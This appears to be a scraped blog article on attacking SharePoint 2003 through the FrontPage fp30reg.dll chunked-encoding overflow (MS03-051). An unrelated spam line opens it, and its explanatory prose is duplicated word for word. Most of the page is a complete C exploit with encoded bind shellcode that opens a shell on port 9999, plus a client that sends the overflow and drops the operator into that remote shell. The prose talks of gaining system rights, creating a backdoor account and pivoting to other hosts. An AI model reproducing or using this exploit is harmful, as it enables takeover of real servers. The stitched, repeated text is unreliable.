kamagra how much to take

Example Attack on SharePoint 2003 With Chunked Encodes and Overflow

In this article I will show how an attack might enter maliciously into a 2003 environment (this won’t work on MOSS) using some checks and exploitations. The code is pretty self-explanatory.

Most Microsoft hackers will note that the default installation directories, as discussed in other articles, are the quickest way to get a hold of a SharePoint site. However, there is other interesting information that can be gathered from the host before you begin your attack, as well as helping facilitate the takeover, from using some pretty common IIS exploits. Firstly, most attackers will execute a simple buffer overflow on the target host, this will in some cases allow the option of executing some arbitrary code on the server. The ultimate goal in this case would be to trip a remote buffer overrun due to a flaw in FrontPage server extensions (if the host is using ClickOnce for application deployment as well these are enabled), when we complete the overflow we should then have local system rights on the server, maybe we can even get a new account created so we can visit this server later and see if it can’t be a bridge for us to other systems. We are going to have to firstly chunked encoded request on our host, this should result in an output somewhat like:

————————————————————————
Event Type: Warning
Event Source: W3SVC
Event Category: None
Event ID: 2002
Description:
Out of process application ‘/LM/W3SVC/1/ROOT’ terminated unexpectedly.
————————————————————————

You should be able to find this in the event log following our attack on the SharePoint site. Our request will look something like POST /_vti_bin/_vti_aut/fp30reg.dl. A chunked encoded post will result in the control of ECX and EDI, with the exception occurring at a mov dword ptr [ECX+4],EDI instruction leading to remote command execution with privileges associated with the IWAM_machinename account.

We are just going to execute a little code in order to fully trip the overflow and see if we can’t get into the server (see code at bottom of this article).

If you want to eliminate this vulnerability, just use the IIS lockdown tool to disable the extensions properly.

********************************************************************************/

In this article I will show how an attack might enter maliciously into a 2003 environment (this won’t work on MOSS) using some checks and exploitations. The code is pretty self-explanatory.

Most Microsoft hackers will note that the default installation directories, as discussed in other articles, are the quickest way to get a hold of a SharePoint site. However, there is other interesting information that can be gathered from the host before you begin your attack, as well as helping facilitate the takeover, from using some pretty common IIS exploits. Firstly, most attackers will execute a simple buffer overflow on the target host, this will in some cases allow the option of executing some arbitrary code on the server. The ultimate goal in this case would be to trip a remote buffer overrun due to a flaw in FrontPage server extensions (if the host is using ClickOnce for application deployment as well these are enabled), when we complete the overflow we should then have local system rights on the server, maybe we can even get a new account created so we can visit this server later and see if it can’t be a bridge for us to other systems. We are going to have to firstly chunked encoded request on our host, this should result in an output somewhat like:

————————————————————————
Event Type: Warning
Event Source: W3SVC
Event Category: None
Event ID: 2002
Description:
Out of process application ‘/LM/W3SVC/1/ROOT’ terminated unexpectedly.
————————————————————————

You should be able to find this in the event log following our attack on the SharePoint site. Our request will look something like POST /_vti_bin/_vti_aut/fp30reg.dl. A chunked encoded post will result in the control of ECX and EDI, with the exception occurring at a mov dword ptr [ECX+4],EDI instruction leading to remote command execution with privileges associated with the IWAM_machinename account.

We are just going to execute a little code in order to fully trip the overflow and see if we can’t get into the server (see code at bottom of this article).

If you want to eliminate this vulnerability, just use the IIS lockdown tool to disable the extensions properly.

  1. #pragma comment(lib,"ws2_32")
  2. #define VER "0.1"
  3. /******** bind shellcode spawns persistent shell on port 9999 *****************************/
  4. unsigned char kyrgyz_bind_code[] = {
  5. 0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,
  6. 0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,
  7. 0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88,
  8. 0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88,
  9. 0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE,
  10. 0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88,
  11. 0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88,
  12. 0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88,
  13. 0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88,
  14. 0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88,
  15. 0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88,
  16. 0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88,
  17. 0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88,
  18. 0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88,
  19. 0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89,
  20. 0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78,
  21. 0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77,
  22. 0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03,
  23. 0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05,
  24. 0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98,
  25. 0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC,
  26. 0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77,
  27. 0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03,
  28. 0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8,
  29. 0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C,
  30. 0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0,
  31. 0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03,
  32. 0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B,
  33. 0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03,
  34. 0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48,
  35. 0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88
  36. };
  37. void cmdshell (int sock);
  38. long gimmeip(char *hostname);
  39. int main(int argc,char *argv[])
  40. {
  41. WSADATA wsaData;
  42. struct sockaddr_in targetTCP;
  43. struct hostent *host;
  44. int sockTCP,s;
  45. unsigned short port = 80;
  46. long ip;
  47. unsigned char header[]= "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1 ";
  48. unsigned char packet[3000],data[1500];
  49. unsigned char ecx[] = "xe0xf3xd4x67";
  50. unsigned char edi[] = "xffxd0x90x90";
  51. unsigned char call[] = "xe4xf3xd4x67";//overwrite .data section of fp30reg.dll
  52. unsigned char shortjmp[] = "xebx10";
  53. printf(" -={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=- "
  54. " > ", VER);
  55. if(argc < 2)
  56. {
  57. printf(" Usage: %s [Target] "
  58. " eg: fp30reg.exe 192.168.63.130 ",argv[0]);
  59. return 1;
  60. }
  61. if(argc==3)
  62. port = atoi(argv[2]);
  63. WSAStartup(0x0202, &wsaData);
  64. printf("[*] Target: %s Port: %d ",argv[1],port);
  65. ip=gimmeip(argv[1]);
  66. memset(&targetTCP, 0, sizeof(targetTCP));
  67. memset(packet,0,sizeof(packet));
  68. targetTCP.sin_family = AF_INET;
  69. targetTCP.sin_addr.s_addr = ip;
  70. targetTCP.sin_port = htons(port);
  71. sprintf(packet,"%sHost: %s Transfer-Encoding: chunked ",header,argv[1]);
  72. memset(data, 0x90, sizeof(data)-1);
  73. data[sizeof(data)-1] = 'x0';
  74. memcpy(&data[16],edi,sizeof(edi)-1);
  75. memcpy(&data[20],ecx,sizeof(ecx)-1);
  76. memcpy(&data[250+10],shortjmp,sizeof(shortjmp)-1);
  77. memcpy(&data[250+14],call,sizeof(call)-1);
  78. memcpy(&data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));
  79. sprintf(packet,"%sContent-Length: %d %x %s 0 ",packet,
  80. strlen(data),strlen(data),data);
  81. if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
  82. {
  83. printf("[x] Socket not initialized! Exiting... ");
  84. WSACleanup();
  85. return 1;
  86. }
  87. printf("[*] Socket initialized... ");
  88. if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
  89. {
  90. printf("[*] Connection to host failed! Exiting... ");
  91. WSACleanup();
  92. exit(1);
  93. }
  94. printf("[*] Checking for presence of fp30reg.dll...");
  95. if (send(sockTCP, packet, strlen(packet),0) == -1)
  96. {
  97. printf("[x] Failed to inject packet! Exiting... ");
  98. WSACleanup();
  99. return 1;
  100. }
  101. memset(packet,0,sizeof(packet));
  102. if (recv(sockTCP, packet, sizeof(packet),0) == -1)
  103. {
  104. printf("[x] Failed to receive packet! Exiting... ");
  105. WSACleanup();
  106. return 1;
  107. }
  108. if(packet[9]=='1' && packet[10]=='0' && packet[11]=='0')
  109. printf(" Found! ");
  110. else
  111. {
  112. printf(" Not Found!! Exiting... ");
  113. WSACleanup();
  114. return 1;
  115. }
  116. printf("[*] Packet injected! ");
  117. closesocket(sockTCP);
  118. printf("[*] Sleeping ");
  119. for(s=0;s<13000;s+=1000)
  120. {
  121. printf(". ");
  122. Sleep(1000);
  123. }
  124. printf(" [*] Connecting to host: %s on port 9999",argv[1]);
  125. if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
  126. {
  127. printf(" [x] Socket not initialized! Exiting... ");
  128. WSACleanup();
  129. return 1;
  130. }
  131. targetTCP.sin_family = AF_INET;
  132. targetTCP.sin_addr.s_addr = ip;
  133. targetTCP.sin_port = htons(9999);
  134. if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
  135. {
  136. printf(" [x] Exploit failed or there is a Firewall! Exiting... ");
  137. WSACleanup();
  138. exit(1);
  139. }
  140. printf(" [*] Dropping to shell... ");
  141. cmdshell(sockTCP);
  142. return 0;
  143. }
  144. /*********************************************************************************/
  145. void cmdshell (int sock)
  146. {
  147. struct timeval tv;
  148. int length;
  149. unsigned long o[2];
  150. char buffer[1000];
  151. tv.tv_sec = 1;
  152. tv.tv_usec = 0;
  153. while (1)
  154. {
  155. o[0] = 1;
  156. o[1] = sock;
  157. length = select (0, (fd_set *)&o, NULL, NULL, &tv);
  158. if(length == 1)
  159. {
  160. length = recv (sock, buffer, sizeof (buffer), 0);
  161. if (length <= 0)
  162. {
  163. printf ("[x] Connection closed. ");
  164. WSACleanup();
  165. return;
  166. }
  167. length = write (1, buffer, length);
  168. if (length <= 0)
  169. {
  170. printf ("[x] Connection closed. ");
  171. WSACleanup();
  172. return;
  173. }
  174. }
  175. else
  176. {
  177. length = read (0, buffer, sizeof (buffer));
  178. if (length <= 0)
  179. {
  180. printf("[x] Connection closed. ");
  181. WSACleanup();
  182. return;
  183. }
  184. length = send(sock, buffer, length, 0);
  185. if (length <= 0)
  186. {
  187. printf("[x] Connection closed. ");
  188. WSACleanup();
  189. return;
  190. }
  191. }
  192. }
  193. }
  194. /*********************************************************************************/
  195. long gimmeip(char *hostname)
  196. {
  197. struct hostent *he;
  198. long ipaddr;
  199. if ((ipaddr = inet_addr(hostname)) < 0)
  200. {
  201. if ((he = gethostbyname(hostname)) == NULL)
  202. {
  203. printf("[x] Failed to resolve host: %s! Exiting... ",hostname);
  204. WSACleanup();
  205. exit(1);
  206. }
  207. memcpy(&ipaddr, he->h_addr, he->h_length);
  208. }
  209. return ipaddr;
  210. }
Share

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>